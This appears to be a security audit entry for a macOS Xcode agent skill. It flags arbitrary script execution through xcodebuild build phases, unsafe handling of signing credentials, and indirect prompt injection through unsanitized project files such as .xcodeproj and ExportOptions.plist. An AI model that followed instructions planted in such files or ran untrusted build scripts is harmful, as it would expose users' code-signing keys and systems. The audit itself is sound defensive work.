The Agent Skills Directory

[COMMAND_EXECUTION]: The skill facilitates the execution of high-privilege macOS developer tools including 'xcodebuild', 'xcrun', and 'instruments'. These tools possess the capability to execute arbitrary build-phase scripts defined within Xcode projects, which can lead to unintended code execution if the project source is untrusted. Furthermore, the instructions explicitly guide the agent to generate and run bash and Python scripts at runtime via 'subprocess.run' to automate complex workflows.
[CREDENTIALS_UNSAFE]: The skill provides instructions for interacting with the macOS 'security' command to find and list code-signing identities ('security find-identity'). It also suggests the use of environment variables to handle sensitive developer keys ('$APPLE_DEVELOPER_KEY') and signing identities ('$XCODE_SIGNING_IDENTITY'), which could lead to exposure if the agent's environment or logs are compromised.
[PROMPT_INJECTION]: The skill exhibits an attack surface for indirect prompt injection by processing external project configuration files.
Ingestion points: Reads and processes user-provided files including '.xcodeproj', '.xcworkspace', 'ExportOptions.plist', and '.mobileprovision' profiles.
Boundary markers: No boundary markers or 'ignore embedded instructions' warnings are implemented to protect the agent when parsing these project files.
Capability inventory: The skill uses 'xcodebuild', 'xcrun', 'security', 'instruments', and 'subprocess.run' (Python) across the workflow.
Sanitization: No sanitization or validation of input paths or project file content is documented, allowing for potential injection of malicious flags or scripts via the project structure.

macos-xcode